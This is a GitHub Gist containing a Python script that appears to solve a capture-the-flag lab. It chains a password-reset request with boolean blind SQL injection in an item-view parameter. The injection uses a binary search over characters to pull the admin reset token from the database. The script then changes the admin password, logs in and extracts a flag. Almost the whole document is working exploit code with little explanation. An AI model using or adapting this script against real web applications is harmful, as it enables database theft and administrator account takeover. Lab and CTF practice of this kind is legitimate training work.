Skip to content

Instantly share code, notes, and snippets.

@thesp0nge
Created March 24, 2023 12:46
Show Gist options
  • Save thesp0nge/e5b0b01c19efecbc890d50c225810a88 to your computer and use it in GitHub Desktop.
Save thesp0nge/e5b0b01c19efecbc890d50c225810a88 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python3
import sys
import requests
import random
import string
import re
def viewItem(s, target, query):
url = "http://%s/item/viewItem.php?id=5+or+%s" % (target, query)
proxies = { "http" : "http://localhost:8080" }
r = s.get(url, proxies=proxies)
if int(r.status_code) == 404:
return True
return False
# Returns True if the password reset request is successful, False otherwise.
def ask_reset_password(s, target, username):
url = "http://" + target + "/login/resetPassword.php"
data = { "username" : username }
proxies = { "http" : "http://localhost:8080" }
response = s.post(url, data=data, proxies=proxies)
ok_message = "Password Reset Link has been sent to you via Email, please check it out."
if (ok_message in response.text):
return True
return False
def change_admin_password(s, target, token, new_password):
url = "http://%s/login/doChangePassword.php" % (target)
data= {"token":token,"password":new_password}
proxies = { "http" : "http://localhost:8080" }
response = s.post(url, data=data, proxies=proxies)
if "Success!" in response.text:
return True
return False
def get_first_flag(s, target, new_password):
url = "http://%s/login/checkLogin.php" % (target)
data = {"username":"admin","password":new_password}
proxies = { "http" : "http://localhost:8080" }
response = s.post(url, data=data, proxies=proxies)
if "Success!" in response.text:
flag_regex = re.compile("FLAG1: [\da-f]*")
flag = flag_regex.findall(response.text)[0][7:]
return flag
else:
return ""
s = requests.session()
# STEP 1. RICHIEDERE IL RESET PASSWORD PER ADMIN
print("[*] Sending password reset request... ", end='')
status = ask_reset_password(s, "192.168.122.219", "admin")
if (status == True):
print(" success!")
else:
print(" failure!")
sys.exit(-1)
print("[*] check if the target is exploitable... ", end='')
status = viewItem(s, "192.168.122.219", "1=1")
if (status == True):
print(" success!")
else:
print(" failure!")
sys.exit(-1)
print("[*] exfiltrating token.... ", end='')
sys.stdout.flush()
token_query = "(select+ascii(substr((select+token+from+user+where+id=1),%d,1)))%s%d"
token_found = ""
for i in range(1,50):
low = 32
high = 126
middle = 0
found = False
while low <= high and not found:
middle = (high + low) // 2
if viewItem(s,"192.168.122.219", token_query % (i,">",middle)):
low = middle + 1
elif viewItem(s, "192.168.122.219", token_query % (i,"<",middle)):
high = middle - 1
else:
token_found += chr(middle)
found = True
if not found:
break
print(token_found)
new_password = ''.join(random.choice(string.ascii_lowercase) for _ in range(10))
print("[*] changing admin password with '%s'" % new_password, end= '')
if change_admin_password(s, "192.168.122.219", token_found, new_password):
print(" success!")
else:
print(" failure!")
sys.exit(-2)
print("[*] login and get first flag...", end='')
flag=get_first_flag(s, "192.168.122.219", new_password)
if flag:
print(flag)
else:
print(" failure!")
sys.exit(-3)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment